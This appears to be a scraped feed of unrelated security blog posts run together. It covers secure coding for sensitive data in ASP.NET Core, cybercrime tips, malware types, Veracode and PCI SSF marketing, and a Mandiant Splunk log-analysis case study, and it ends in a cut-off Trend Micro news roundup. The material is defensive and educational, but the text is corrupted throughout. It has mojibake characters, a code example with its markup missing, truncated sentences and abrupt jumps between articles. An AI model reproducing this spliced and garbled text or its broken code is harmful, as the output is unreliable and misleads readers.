Let's discuss some of the most common vulnerabilities that can expose sensitive user data.

Leaking access control that enables forced browsing to restricted content

Due to inadequate access control, users who are not expected to see sensitive data may in fact be able to access it, even though the data is not referenced by the application in any way. An attack called force browsing takes advantage of this situation.

Imagine you're a regular user of a web application, and when you look around the UI, you don't see any administrative functionality available. Still, if you manually enter a URL that you think may be available to admin users (such as??ッhttps://www.myapp.com/admin), you do see the admin UI. This is forced browsing: the application didn't guide you to a restricted resource, but neither did it prevent you from accessing it.

Improperly managed sessions

When sessions are managed improperly, session IDs of authenticated users are at risk of being exposed, and attackers can take advantage of this to impersonate legitimate users. Two common attacks that are made possible by improper session management are session hijacking and session fixation. Attacks like these can have a severe impact if targeted at privileged accounts and can cause massive leakage of sensitive data.

One major reason why sessions can be mismanaged is that developers sometimes write their custom authentication and session management schemes instead of using battlefield-tested solutions, but doing this correctly is hard.

Insecure cryptographic storage

Insecure cryptographic storage??ッrefers to unsafe practices of storing sensitive data, most prominently user passwords. This is not about not protecting data at all, which results in storing passwords as plain text. Instead, this is about applying a wrong cryptographic process or a surrogate, such as:

  • Using an outdated and weak hashing algorithm (think SHA1 or MD5), which makes cracking hashed data quick and easy once the data has been exposed.
  • Using a custom hashing algorithm.
  • Using encryption instead of hashing for password protection.
  • Using protection that is not a cryptographic process at all, such as string transformations or Base64 encoding.

This vulnerability is extra important because secure cryptographic storage is the last line of defense: strong cryptography saves the data once it has been exposed by other risks in an application.

How do you protect sensitive data?

Let's see what kind of??ッsecure coding practices??ッcan help you avoid vulnerabilities such as the ones listed above, and minimize the risk of disclosing sensitive data.

To prevent forced browsing to restricted content

  • Implement a robust authorization mechanism??ッwith early and uniform authorization checks that are executed right after authentication.
  • Use proven frameworks for authentication and authorization. Modern frameworks often implement secure authentication and authorization behind the scenes, provide sensible defaults, and allow you to write extensions based on your application's requirements. For example, on the Microsoft stack, ASP.NET Core Identity is a proven framework that abstracts away authorization management.
  • Do not rely on hiding privileged UI as the only authorization check. Hiding a UI element will not prevent access to the resource that it refers to. For example, in an ASP.NET Core MVC application, let's say there's a link to a view that only authenticated users should see:
    @if (User.Identity.IsAuthenticated)
    {
        

This is a hidden page!

}

However, if the??ッHome??ッcontroller's??ッHidden??ッaction is not configured as available to logged-in users only, an anonymous user would still be available to enter the direct URL and access the hidden page. To prevent this, the controller action should be protected as well:

    [Authorize]
    public IActionResult Hidden() => View();
  • Cover authorization logic with tests. As your codebase evolves, inadvertent changes can create vulnerabilities, and it's vital to make sure they are detected as soon as possible. This is why it's important to write and maintain automated tests for authorization code that test all roles, as well as anonymous access.

To avoid improperly managed sessions and session ID leaks

  • Do not expose session IDs in URLs. Keeping a session ID as part of a URL is an easy way to enable session hijacking via URL sharing or logging.
  • Keep session IDs in cookies only. Instead of using URLs, only keep session IDs in cookies. This way, unless an attacker can access request headers, sessions will not be hijacked maliciously. In addition, they certainly won't be hijacked unintentionally as a side effect of URL sharing.
  • Use HTTPS??ッthroughout your application. Don't refer to HTTP resources from pages that use HTTPS. Make sure to configure HTTP to HTTPS redirects. If for some reason you're forced to use a mix of HTTPS and HTTP, create new session IDs every time when connection security changes from HTTPS and HTTP, or vice versa.
  • Use HSTS (but do it carefully). When you've gained confidence in your full-HTTPS infrastructure, start setting the??ッHSTS??ッ(Strict-Transport-Security) header that prohibits the web browser from attempting to communicate with the web application via plain HTTP ever again. Since browsers actively cache HSTS settings, start with a small??ッmax-age??ッvalue and gradually increase if all goes well. This is how you can configure initial HSTS options in an ASP.NET Core application:
    public void ConfigureServices(IServiceCollection services)
    {
        // ...
        services.AddHsts(options => options.MaxAge = TimeSpan.FromHours(6));
        // ...
    }
  • Maintain healthy cookie settings. Unless client-side scripts in your application need to read or set cookie values, set the??ッHttpOnly??ッattribute. When transmitting cookies over HTTPS, make sure to set the??ッSecure??ッattribute. Enforce a??ッStrict??ッsame-site policy if your application doesn't use OAuth2, or??ッLax??ッif it does. Finally, set cookie expiration to a reasonably short time span. Here's how you would configure cookies in an ASP.NET Core application that uses ASP.NET Core Identity:
    public void ConfigureServices(IServiceCollection services)
    {
        // ...
        services.ConfigureApplicationCookie(options =>
        {
            options.Cookie.HttpOnly = true;
            options.Cookie.SecurePolicy = CookieSecurePolicy.Always;
            options.Cookie.SameSite = SameSiteMode.Strict;
            options.ExpireTimeSpan = TimeSpan.FromHours(1);
        });
        // ...
    }

To keep cryptographic storage secure

  • Do not use encryption for password storage. Use hashing instead. Encryption is a two-way process, and hashing is a one-way process. When a database of symmetrically encrypted passwords is exposed, the attacker gets access to the encryption key and instantly restores passwords to their original form, making protection useless. To make it difficult or impractical for an attacker to obtain original passwords, they should be hashed.
  • Apply a unique salt to each password. A salt is a randomly generated string added to a password before hashing. Salting protects against attacks based on pre-computed hashes and helps hide identical passwords in a database.
  • Use a modern hashing algorithm??ッthat is slow (a good thing!) and designed for secure password storage. The extent to which an algorithm is slow should be configurable using a work factor. OWASP currently recommends choosing between??ッArgon2id,??ッPBKDF2, and??ッBcrypt.
  • Never create your own hashing algorithms??ッfor production applications. Writing hashing algorithms is insanely hard. A half-baked custom algorithm will inevitably introduce multiple weaknesses, thus defeating the purpose of the endeavor.

Summary

We've learned how applying a set of secure coding practices in access control, session management and cryptographic storage can help you avoid a set of vulnerabilities and minimize the risk of disclosing sensitive data.

There's one more fundamental advice that OWASP gives:??ッdon't store sensitive data unless you absolutely need to. Data that is not stored cannot be compromised.

Whatever decisions you make on data storage policy, remember to detect vulnerable code early with continuous testing, code review, static and dynamic analysis.

The Top 4 Tips for Keeping Your Digital Marketing Company Safe From Cyber Crime

As the Digital Age flourishes, more and more people are switching to working online and having businesses that revolve around all things digital and technological. A well-known example of this is the marketing industry. In recent years the marketing industry has converted to being almost entirely digital; thus creating the genre of marketing: digital marketing. Almost every company has or has the ability to reap the benefits of digital marketing, making this industry a lucrative and important one.

As more people are beginning or expanding their careers in digital marketing, there are some things that they should know; most notably, how to keep their digital marketing company safe from cybercrime. Cybercrime can impact and ruin people’s lives as hackers can steal, exploit, and tamper with personal information and accounts. And for a business that exists only digitally, it’s important to take the necessary precautions in order to keep the business safe.

What You Need to Know to Keep Your Company Safe

Whether you own a digital marketing business, or you work for one, it’s imperative that you take cybercrime seriously. An expert from a company that is a digital forensics investigator pointed out that cybercrime is becoming a common threat for internet users. He added that hackers are becoming more skilled as people’s dependence on technology increases. With that being said, here are 4 ways that you can protect your digital marketing business or your digital marketing job from cybercrimes.

1.    Be Sure to Keep All of Your Software Up to Date

This is perhaps one of the easiest ways that you can make sure that your digital marketing business is safe from cybercrime. One of the most common ways that hackers get into accounts and documents is by finding code defects in the software. When it comes to the software designers’ attention that there is a code defect, an update will come out that will fix this error. However, when people don’t update their software, hackers can see this and will enter the account, document, etc., through this code defect. Because hackers can see what software has been updated and what software hasn’t, it will be worth your while to keep all of your software up to date.

2.    Think About Email Marketing Security

To protect your marketing content and all of your clients’ personal information, you will have to make sure that your email marketing system is secure. Hackers are aware that email is one of the most essential tools in digital marketing, so will try to gain access to these accounts. 

Email marketing systems often hold crucial, yet sensitive information belonging to clients; therefore, you should utilize email marketing tools that feature security measures that will store sensitive information using encryption, and lock down access. To further ensure that your marketing email is secure, make it a point to train all employees on how to keep these systems secure and avoid data breaches.

3.    Encrypt and Back-Up Sensitive Data

Encrypting and backing up data is the best way to avoid a security breach and to prevent hackers from stealing all of your data in the event of cybercrime. Data encryption means to translate data into another code that only people with access to a decryption key/password can read it. Similarly, backing up data simply means to make copies of the data and store it on another device or in a cloud storage provider.

4.    Set Up Strict Limitations

It will be in digital marketing agencies’ best interest to set up strict limitations that will not allow employees to install unauthorized software or open files that contain viruses. Setting up strict digital limitations could potentially save you from a catastrophic event. By being proactive and setting up strict limitations will prevent malware from infecting your company’s computer and network.

Keep Your Digital Marketing Content Secure

Digital marketing companies are a common target when it comes to internet crime, so it’s necessary you do all that you can to avoid being hacked or exploited. To keep yourself, your employees, your clients, and your overall business safe and secure keep these 4 digital marketing security tips in mind.  Turning these tips into actions will significantly lower your chances of becoming a victim of cybercrime.

About the Author

Jennifer Bell is a freelance writer, blogger, dog-enthusiast, and avid beachgoer operating out of Southern New Jersey

The post The Top 4 Tips for Keeping Your Digital Marketing Company Safe From Cyber Crime appeared first on CyberDB.

Security settings nobody cares to check when installing new software and why it’s dangerous

We live in the age of cyberspace, and every day each of us is faced with the need to use information technology. The human online presence is boundless, starting from posting personal data on social networks, making online payments, and downloading new software. Thus, our smartphones and PCs contain a lot of information about us. And we become much more vulnerable to attackers online than in real life. Cybersecurity is one of the key aspects of life in the information era. All electronic information, services, and devices require protection and compliance with certain security rules. But users rarely use reliable anti-virus software or specialized solutions to protect against DDoS attacks and ignore security settings. What can be the outcome and how to avoid potential hazards?

What Is Cyber Threat?

Everyone must have met this term on social media. But what exactly does it mean? It is a malicious act that is aimed at data damaging and stealing or disrupting the smooth functioning of digital devices. One of the first known computer viruses was Elk Cloner spread in the wild in the early 1980s. But cyber threats do not remain static and become more sophisticated. Malware is often hidden in software that you install on your devices. And the likelihood of this risk increases if you download it not from a trusted source, but from the net. When installing new programs, it is important to be alerted by various warnings, especially if they want to access your personal data.

Types of Cyber Security Threats

Today there is a great variety of malicious programs that may unnoticeably pop in your computer and gadgets. The most common are the following ones:

Viruses are malware that joins another program and when it is launched (which usually happens through the user’s negligence), it begins to reproduce itself and modify other applications on the computer by implementing elements of its malicious code into them.

Worms are programs very similar to a virus. It is capable of self-replication and can lead to irreversible consequences for your system. However, the worms do not need to infect other files to reproduce.  They crawl into a computer and send their copies to all your contacts.

Trojans, also known as Trojan horses, are one of the most dangerous hazards. They usually try to trick you by disguising as useful programs. After entering the system, attackers gain free access to the infected computer. Trojans pave the way for other malicious objects, such as viruses and ransomware.

Ransomware is a program that blocks your device and encrypts your files. It demands a ransom to get the system restored. Ransomware is considered a weapon of choice for cybercriminals because it enables them to make significant profits in cryptocurrencies that are difficult to trace. The ransomware code can be easily obtained from the black market, and it is never easy to defend against it.

Adware is a code that is included in the software to display advertisements without the user’s knowledge. Often such programs collect and forward personal information about the user to their developer, change various browser settings, and create uncontrolled traffic by the user. All of this can lead to both security policy violations and direct financial losses.

Spyware collects information about an individual user or organization without their knowledge. This malware records which keys users press getting personal data such as usernames, passwords, or credit card details.

Rootkits are able to hide hazards from anti-virus programs. They give attackers access to administration of the infected computer. They usually go unnoticed by the user, other programs, and the operating system itself.

Cryptojacking is a type of malware that is becoming more widespread. These objects are used for hidden cryptocurrency mining and are usually installed using a Trojan program. As a result, intruders can use the resources of your computer to mine cryptocurrencies.

Main Mistakes That Cause Data Leakage

Sometimes users themselves create fertile ground for cyber threats. We ignore and neglect to implement many basic security measures. The risk of catching malware increases in the following cases:

·        A download of free software. Buy legal programs and register them. Free software often asks to install additional programs on your PC that may carry a serious threat.

·        Untimely software updates. Make sure your software is up to date. Take time to install automatic updates for your system as they reduce the vulnerability of your system. It should be downloaded from trusted software vendors.

·        Occasional downloads. Block pop-ups to prevent unwanted programs. The web browser you are using should be locked. This prevents potentially dangerous ads from being displayed on the screen. Google Chrome, Firefox, and Microsoft Edge have built-in blockers. Viruses often use the extensions .vbs, .shs, .exe, .scr, .chm, .bat. If the system asks to download or open such a file, cancel your previous actions.

·        Opening potentially unsafe attachments and links. Do not click on links or open attachments received from unknown e-mail addresses. One of the most important sources of malware is emails from scammers. It can initiate fishing even from the Spam folder. Remove unwanted emails from strangers or companies, no matter how friendly they may look. Immediately close sites that open on your computer without your consent. Never follow any links as a single click can lead to malicious software being downloaded to your computer.

·        Ignoring recommended security settings. There are some basic safety practices to follow to boost your device protection. Users often neglect them opening the way to attackers.

Steps on Protecting Your PC

Everybody can  And there is a whole list of such solutions that will optimize the security level of your devices.

1.      Create strong passwords

This is one of the key rules of cybersecurity. The password must consist of a complex combination of characters. Use a different password for each service and site and never share your passwords with anyone, keep them on paper, or enter them on third-party sites. Use other protection means where.  For Windows, for example, you can activate Windows Hello technology which uses the face recognition method to log in. You can also use password managers such as KeePass.

2.      Back up your system

This process ensures that all data is copied and stored in a separate place to avoid loss of information. If the original document is damaged, you can restore it from a copy stored in a safe place. OS developers give clear-cut instruction on how to do it:

 You can also use special cloud storage.

3.      Enable two-factor authentication

Most reputable online services support two-factor authentication. Enable it with a software token (available on Facebook, Twitter, Google, etc.) or with a one-time password with SMS delivery.

4.      Use VPN

Use a VPN to protect your network data from being stolen. Experts consider public Wi-Fi networks unsafe. When working with them, you should not enter access to passwords, logins, personal data. Use such an Internet connection only via a VPN.

5.      Install antivirus software

Reputable antivirus programs will allow you to more carefully select and examine any software for its potential danger. Besides, the antivirus software will additionally ask for confirmation of the download decision and make comments on the security of file installation.

Unfortunately, it is not possible to entirely eliminate the risk. But implementing good safety practices helps significantly reduce it. It is not difficult and often free of charge to boost your security. Timely actions can prevent a lot of potential hazards. It would be the best approach to create a safety checklist covering the above-mentioned tips and check its compliance regularly.

The post Security settings nobody cares to check when installing new software and why it’s dangerous appeared first on CyberDB.

NIST Profile on Responsible Use of PNT Services

September 15, 2020: 10:00 a.m. – 3:00 p.m. EDT September 16, 2020: Breakout sessions (option of a 1 hour session between 9:30 a.m. – 4:00 p.m. EDT) to discuss the contents of the draft Positioning, Navigation and Timing (PNT) Profile Pre-Read Material: Cybersecurity Profile for the Responsible Use of Positioning, Navigation, and Timing (PNT) Services - Annotated DRAFT Outline Video Recording from the event The September 15th workshop will include: A webinar to provide an update on NIST’s latest efforts to develop a Profile for the systems that form or use PNT data. Panel discussions with

43% of Orgs Think DevOps Integration Is Critical to AppSec Success

It???s no secret that the rapid speed of modern software development means an increased likelihood of risky flaws and vulnerabilities in your code. Developers are working fast to hit tight deadlines and create innovative applications, but without the right security solutions integrated into your processes, it???s easy to hit security roadblocks or let flaws slip through the cracks.

We recently dug through the ESG survey report,ツ?Modern Application Development Security, which uncovers some interesting data about the state of DevOps integration in the modern software development process. As the report states, DevOps integration is critical for improving your organization???s application security (AppSec) program, as automating and integrating solutions removes some of the manual work that can slow teams down and moves security testing into critical parts of the development process.

???DevOps integration reduces friction and shifts security further left, helping organizations identify security issues sooner,??? the report says. ???While developer education and improved tools and processes will no doubt also improve programs, automation is central to modern application development practices.???

Level of DevOps and AppSec Integration???

According to the survey results, nearly half of organizations agree; 43 percent believe that DevOps integration is the most important piece of the puzzle for improving their AppSec programs. The report also outlines 10 elements of the most successful AppSec programs, and topping that list is ensuring that your AppSec controls are highly integrated into the CI/CD toolchain.

Integration challenges

For some survey respondents, that???s easier said than done. Nearly a quarter (23 percent) said that one of their top challenges with current AppSec testing solutions is that they have poor integration with existing development and DevOps tools, while 26 percent said they experience difficulty with ??? or lack of ??? integration between different AppSec vendor tools.

AppSec tool proliferation is a problem too, with a sizeable 72 percent of organizations using more than 10 tools to test the security of their code. ???Many organizations are employing so many tools that they are struggling to integrate and manage them. This all too often results in a reduction in the effectiveness of the program and directs an inordinate amount of resources to managing tools,??? they explain further.

So where should organizations like yours start? By selecting a vendor with a comprehensive offering of security solutions that integrate to help you cover those bases and consolidate solutions while reducing complexity. That???s where Veracode shines. We bring the security tests and training tools you need together into one suite so that you can consolidate and keep innovating ??? securely. And your organization can scale at a lower cost, too: our range of integrations and Veracode solutions are delivered through the cloud for less downtime and more efficiency.

Simplifying AppSec

We aim to simplify your AppSec program by combining five key analysis types in one solution, all integrated into your development process. From ???my code,??? to ???our code,??? to ???production code,??? we have you covered with Static Analysis (SAST), Dynamic Analysis (DAST), Software Composition Analysis (SCA), Interactive AppSec Testing (IAST), and Manual Penetration Testing (MPT).

My Code, Our Code, Production Code???

Automating SAST, DAST, and SCA in the pipeline means that you can incorporate testing without needing to wait for your security team to step in, fixing flaws the moment you spot them to keep projects moving forward quickly. In fact, by building and integrating security testing into their CI/CD pipeline, we know that some development teams have reduced their median time to remediation (MTTR) by a whopping 90 percent, driving down risk and freeing up valuable time.

Want to learn more about integrating AppSec into the development process? Check out this short demo video of Veracode Static Analysis.

ツ?

A “DFUR-ent” Perspective on Threat Modeling and Application Log Forensic Analysis

Many organizations operating in e-commerce, hospitality, healthcare, managed services, and other service industries rely on web applications. And buried within the application logs may be the potential discovery of fraudulent use and/or compromise! But, let's face it, finding evil in application logs can be difficult and overwhelming for a few reasons, including:

  • The wide variety of web applications with unique functionality
  • The lack of a standard logging format
  • Logging formats that were designed for troubleshooting application issues and not security investigations
  • The need for a centralized log analysis solution or SIEM to process and investigate a large amount of application log data

So, in this blog post, we discuss threat modeling concepts that can help prioritize logging decisions and unleash the ability to identify and investigate attacks against an application. To help us demonstrate, we'll describe situations for a fictitious organization called Dog and Feline Urgent Response, or DFUR, that we presented at the 2020 SANS Digital Forensics & Incident Response (DFIR) Summit.

We selected Splunk Enterprise Security (ES) as DFUR’s SIEM and logging analysis platform, but this is just one option and there are multiple technologies that can facilitate application log analysis. We created a Splunk application called “Dog and Feline Urgent Response (DFUR)” available on the FireEye GitHub that contains pre-indexed data and dashboards that you can use to follow along with the following attack scenarios.

But, enough kitten around. Let’s introduce you to DFUR!

DFUR: Dog and Feline Urgent Response

DFUR is a long-standing organization in the pet wellness industry that provides care providers, pet owners, and insurance providers with application services.

  • Care providers, such as veterinarians, use DFUR to process patient records, submit prescriptions, and order additional care services
  • Pet owners use DFUR to make appointments, pay bills, and see diagnostic test results
  • Insurance providers use DFUR to receive and pay claims to pet care providers

Application users log into a web portal that forwards logon and user transaction logs to DFUR’s Splunk ES instance. Backend databases store metadata for users, such as street addresses and contact information.

DFUR Security Team Threat Modeling

After stumbling through several incidents, the DFUR security team realized that their application did not log the information needed to answer investigative question clearly and quickly. The team held workshops with technical stakeholders to develop a threat model and improve their application security strategy. They addressed questions, such as:

  • What types of threats does DFUR face based on industry trends?
  • What impact could those threats have?
  • How could the DFUR application be attacked or abused?
  • What log data would DFUR need to prove an attack or fraud happened?

The DFUR team compiled the stakeholder feedback and developed a threat profile to identify and prioritize high-risk threats facing the DFUR application platform, including:

  • Account takeover and abuse
    • Password attacks (e.g., credential stuffing)
    • Bank account modifications
    • PHI/PII access
    • Health service modifications or interruptions
  • Fraudulent reimbursement claim submission
  • Veterinarians over-prescribing catnip

The DFUR security team discussed how they could identify threats using their currently available logs, and, well, the findings were not purr-ty.

Logging Problems Identified

The DFUR team used their threat model to determine what log sources were relevant to their security mission, and then they dug into each one to confirm the log events were valid, normalized, and accessible. This effort produced a list of high-priority logging issues that needed to be addressed before the security team could move forward with developing methods for detection and analysis:

  • Local logs were not forwarded to their Splunk ES instance. Only a limited subset of logging was forwarded to their Splunk ES instance, so DFUR analysts couldn't search for the actions performed by users who were authenticated to the application portal.
  • Inaccurate field mapping. DFUR analysts identified extracted field values that were mapped to incorrect field names. One example was the user-agent in authentication log events had been extracted as the username field.
  • Application updates sometimes affected Splunk ingestion and parsing. DFUR analysts identified servers that didn't have a startup script to ensure log forwarding was enabled upon system reboot. Application updates changed the logging output format which broke field extractions. DFUR analysts didn't have a way to determine when log sources weren't operating as expected.
  • Time zone misconfigurations. DFUR analysts determined their log sources had multiple time zone configurations which made correlation difficult.
  • The log archival settings needed to be modified. DFUR analysts needed to configure their Splunk ES instance data retirement policy to maintain indexed data for a longer time period and archive historical data for quick restoration.
  • Source IP addresses of users logging into the portal were masked by a load balancer. The DFUR analysts realized that the source IP address for every user logon was a load balancer, which made attribution even more difficult. The X-Forwarded-For (XFF) field in their appliances needed to be enabled.

Analysis Problems Identified

The DFUR infosec team reviewed how previous incidents involving the DFUR application were handled. They quickly learned that they needed to solve the following operational issues before they could effectively investigate application attacks:

  • Inconsistency during manual analysis. DFUR analysts took different approaches to searching their Splunk ES instance, and they would reach different conclusions. Playbooks were needed to define a standard investigative methodology for common incident scenarios.
  • No documentation of log fields or sources. Some DFUR analysts were not aware of all relevant data sources that were available when investigating security incidents. This led to findings that were based on a small part of the picture. A data dictionary was needed that defines the log sources and fields in the DFUR Splunk ES instance and the retention time for each log source.
  • Application logs were designed for troubleshooting, not investigating. The DFUR application was configured to log diagnostic information, application errors, and limited subsets of successful user activity. The DFUR team needed to reconfigure and develop the application to record more security related events.

DFUR: New and Improved Monitoring and Detection

The DFUR team addressed their application log and analysis problems and started building a detection and investigative capability in their Splunk ES instance. Using the analysis workflows developed during the threat modeling process, the DFUR team designed Splunk dashboards (Figure 1) to provide detection analytics and context around three primary datapoints: usernames, IP addresses, and care providers (“organizations”).


Figure 1: DFUR monitoring and detection dashboard

The DFUR team created the Splunk dashboards using Simple XML to quickly identify alerts and pivot among the primary datapoints, as seen in Figure 2. The DFUR team knew that their improved and streamlined methodology would save time compared to exporting, analyzing, and correlating raw logs manually.


Figure 2: Pivoting concepts used to develop DFUR dashboards

Newly armed (legged?) with a monitoring and detection capability, the DFUR team was ready to find evil!

Attack Scenario #1: Account Takeover

The next morning, the DFUR security team was notified by their customer service team of a veterinarian provider with the username ‘labradorable’ who hadn’t received their daily claims payment and noticed their banking information in the DFUR portal was changed overnight.

A DFUR analyst opened the User Activity Enrichment dashboard (Figure 3) and searched for the username to see recent actions performed by the account.


Figure 3: User Activity Enrichment dashboard

The analyst reviewed the Remote Access Analytics in the dashboard and identified the following anomalies (Figure 4):

  • The username reminder and password reset action was performed the day before from an Indonesia-based IP address
  • The user account was logged in from the same suspicious IP address shortly after
  • The legitimate user always logs in from California, so the Indonesia source IP login activity was highly suspicious


Figure 4: Remote access analytics based on user activity

The DFUR analyst clicked on the Application Activity tab in the User Activity Enrichment dashboard to see what actions were performed by the user while they were logged in from the suspicious IP address. The analyst identified the user account logged in from the suspicious IP address and performed an email address change and added two (2) new bank accounts, as seen in Figure 5.


Figure 5: Application activity timeline filtered based on IP address

The DFUR analyst confirmed that the two (2) bank accounts were added by the user to the care provider with organization ID 754354, as seen in Figure 6.


Figure 6: Bank accounts added and assigned to a provider

By clicking on the organization ID in the Splunk results table, the DFUR analyst triggered a drill-down action to automatically open the Organization Enrichment Dashboard and populate the organization ID value with the results from the previous panel (Figure 7). The DFUR analyst determined that the bank routing information for the new bank accounts was inconsistent with the organization’s mailing address.  


Figure 7: Organization Enrichment Dashboard

The activity indicated that the attacker had access to the user’s primary email and successfully reset the DFUR account password. The DFUR analyst confirmed that no other accounts were targeted by the suspicious IP address (Figure 8).


Figure 8: IP Address Enrichment dashboard

Attack Scenario #2: Credential Stuffing

Later that afternoon, the DFUR team began receiving reports of account lockouts in the patient and provider portals when users tried to login. The security team was asked to investigate potential password attack activity on their DFUR platform.

The DFUR analyst pulled up the main monitoring and detection dashboard and scrolled down to the panel focused on identifying potential password attack activity (Figure 9). They identified five (5) IP addresses associated with an elevated number of failed login attempts, suggesting a password spray or credential stuffing attack with varying success.


Figure 9: Dashboard panel showing potential password attack events

The DFUR analyst clicked on one of the IP addresses which triggered a drill-down action to open the IP Address Enrichment dashboard and prepopulate the IP address token value (Figure 10).


Figure 10: IP Address Enrichment dashboard

The DFUR analyst identified more than 3,000 failed login attempts associated with the IP address with three (3) successful logins that morning. The Remote Access Analytics panels for the IP address further showed successful logins for accounts that may have been successfully compromised and need to be reset (Figure 11).


Figure 11: Remote access analytics for IP address

Conclusion

After implementing the newly developed logs and analysis capabilities and by leveraging Splunk’s security solutions, the DFUR security team drastically improved key metrics aligned with their application security missions:

  1. Identify compromise and fraud before customers report it
  2. Analyze 90% of application security events within 30 minutes
  3. Answer all investigation questions from users, compliance, and legal teams

Mandiant and the whole DFUR security team hope you can use the scenarios and references in this post to improve your log analysis and how you leverage a SIEM solution in the following ways:

  • Reflect on your current logging gaps and capabilities to improve
  • Enhance logs from “whatever the developers implemented” to “designed to be investigated”
  • Develop investigative workflows that are reliable and repeatable
  • Correlate pivot points between your data sources and streamline correlation capabilities
  • Create monitoring and alerting capabilities based on threat modeling
  • Lower the technical barrier for comprehensive analysis
  • Implement similar analysis capabilities to those in the “DFUR” Splunk application, linked in the References section
  • Understand that logs can lead into better security analytics and strengthening of your security operations

References

For organizations that utilize Splunk security solutions as their SIEM solution, for automation, analytics or log aggregation, or want to try out for free with Splunk’s free trial download, we developed an application called “Dog and Feline Urgent Response (DFUR)” to demonstrate application log forensic analysis and dashboard pivoting concepts. The code contains pre-indexed data and CSV files referenced by searches contained in four Splunk XML dashboards. All data, such as IP addresses and usernames, was fabricated for the purposes of the demo and any association with organizations, users, or pets is coincidental.

The Migration From PA-DSS to SSF: Everything You Need to Know

Technology is constantly changing and advancing. Payment platforms are no exception. As these new platforms emerge, the software supporting the platform must be reliable and secure. Without secure payment platforms, payment transactions and data could be compromised.

The PCI Software Security Framework (SSF) sets standards and requirements for both traditional and modern payment software. The security standards, aimed at vendors, are in place to protect payment transactions and data, minimize vulnerabilities, and defend against cyberattacks.

To ensure that vendors are following the standards, Software Security Framework Assessors (SSF Assessors) perform evaluations of the payment software products against the Secure Software Lifecycle (Secure SLC) and Secure Software Standards. [The Secure SLC provides security requirements for payment software vendors to integrate security throughout the software development lifecycle. The Secure Software Standard provides security requirements for building secure payment software that protects the confidential data stored, processed, or transmitted using payment transactions.] Following the evaluations, the PCI Software Security Council (SSC) lists both Secure SLC Qualified Vendors and Validated Payment Software on the PCI SSC website for merchants to reference.

The SSF encompasses the same requirements as the Payment Application Data Security Standard (PA-DSS) ??? such as software development and lifecycle management principles for security in traditional payment software ??? but at a broader scale. SFF not only validates traditional payment software but also provides a methodology and approach for evaluating modern and future payment software. The methodology for new and future payment software encourages nimble developments, developer training and secure coding practices, and integration and automation of security into the software development lifecycle.

Since separate standards for PA-DSS are no longer necessary, the PCI SSC will retire PA-DSS at the end of October 2022. To help you prepare for the transition from PA-DSS to SSF, here are some need-to-know facts listed on the PCI webpage:

  • Existing PA-DSS validated applications will remain on the List of Validated Payment Applications until their expiry dates. At the end of October 2022,ツ?PCI SSC will move PA-DSS validated payment applications to theツ????Acceptable Only for Pre-Existing Deployments??? tab.ツ?
  • You can submit new payment applications for PA-DSS validation until June 30, 2021.
  • PCI SSC now lists both Secure SLC Qualified Vendors and Validated Payment Software on the PCI SSC website.
  • PCI will recognize payment software that meets the Secure Software Standard on the PCI SSC List of Validated Payment Software, which will supersede the current List of Validated Payment Applications at the end of October 2022.

If you are a PA-DSS validated vendor ??? or not yet validated by PCI ??? and need help meeting the new SSF requirements, Veracode can help. A good place to start is our three-tiered Veracode Verified??「 program, which offers a proven roadmap to a mature and comprehensive AppSec program and includes many elements required for compliance with security regulations, including PCI SSF.

Check out our Veracode Verified webpage to learn more about the program.

Benefits of Becoming a Participating Organization

 

It is great that your organization takes securing payment data seriously. Now is the time to take the next step forward and make a difference by becoming a PCI SSC Participating Organization, (PO). POs play a key role in both influencing the ongoing development of PCI Security Standards and programs, and in helping ensure that PCI Security Standards are implemented globally to secure payment data.

Why Application Security is Important to Vulnerability Management

It was the day before a holiday break, and everyone was excited to have a few days off to spend with friends and family. A skeleton crew was managing the security operations center, and it seemed as though every other team left early to beat the holiday traffic. Every team other than the vulnerability management (VM) team that is. Just before it was time to leave for the day, and the holiday break, the phone rang. We were notified of a zero-day vulnerability, and our CISO requested a report on the location of the risk within the enterprise. Does this sound familiar?

This happened to me. I was part of the vulnerability management team leading the web application scanning program for a Fortune 100 company. When they announced a major struts vulnerability targeting SWIFT, my CISO wanted to know exactly where we could find it in our applications. As part of our prioritization efforts at the time, and according to our internal security policy, the VM team was only scanning our external applications dynamically. Sure, the software development lifecycle (SDLC) process included rigorous testing throughout the different stages, however, the data collected in some cases was point-in-time, and access to this data, if it persisted, was not accessible to the VM team.

One of the main reasons we continuously analyze our assets is to be aware. You don???t just want to know what vulnerabilities are present within your servers, containers, applications, and libraries. You also want to know what else is out there so when your CISO asks you where the zero-day vulnerability exists in your enterprise, you can quickly have an informed answer without having to rescan every single asset in your inventory to provide a report.

This is why the VM and security function need to be part of the development process. It???s not because security wants to be the persistent nag always asking, ???Did you scan it????, ???Did you scan it????, but it is their job to be proactive. Yes, I said it. Vulnerability Management is proactive. I can???t begin to tell you how many times I???ve heard people say, ???What???s the point of vulnerability management anyways? It???s just a reactive response to the inevitable.??? Collecting intelligence from your assets is a proactive measure that allows you to quickly assess the risk and remediate or mitigate as needed.ツ?

At Veracode, we provide you with the data from your application security program so it can be utilized as part of your vulnerability management program. Do you need to find where struts exist in your applications? No problem. With software composition analysis, we are able to identify all the libraries you are calling within your application, and we are even able to see what those libraries are calling. If Struts or any other library that poses a risk to your application is identified, we are going to let you know. Whether it be a Common Vulnerability and Exposure (CVE) finding or a Common Weakness Enumeration (CWE) category of flaw, we can identify it using static or dynamic analysis. We can then give you this intelligence so that the next time you are asked where the risk is, you can quickly pull from the data you have proactively collected and provide your CISO the risk data necessary to make quick, informed decisions.

To learn more about managing vulnerabilities, check out our comprehensive application security solutions. ツ?

This Week in Security News: Microsoft Fixes 129 Vulnerabilities for September’s Patch Tuesday and Trend Micro’s XDR Offerings Simplify and Optimize Detection and Response

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about this month’s Patch Tuesday update from Microsoft. Also, learn about Trend Micro’s Worry-Free XDR: a new version of its XDR platform designed to extend the power of correlated detection and response beyond the endpoint for smaller businesses.

Read on:

Exposed Docker Server Abused to Drop Cryptominer, DDoS Bot

Malicious actors continue to target environments running Docker containers. Trend Micro recently encountered an attack that drops both a malicious cryptocurrency miner and a distributed denial-of-service (DDoS) bot on a Docker container built using Alpine Linux as its base image. A similar attack was also reported by Trend Micro in May; in that previous attack, threat actors created a malicious Alpine Linux container to also host a malicious cryptocurrency miner and a DDoS bot.

Microsoft Fixes 129 Vulnerabilities for September’s Patch Tuesday

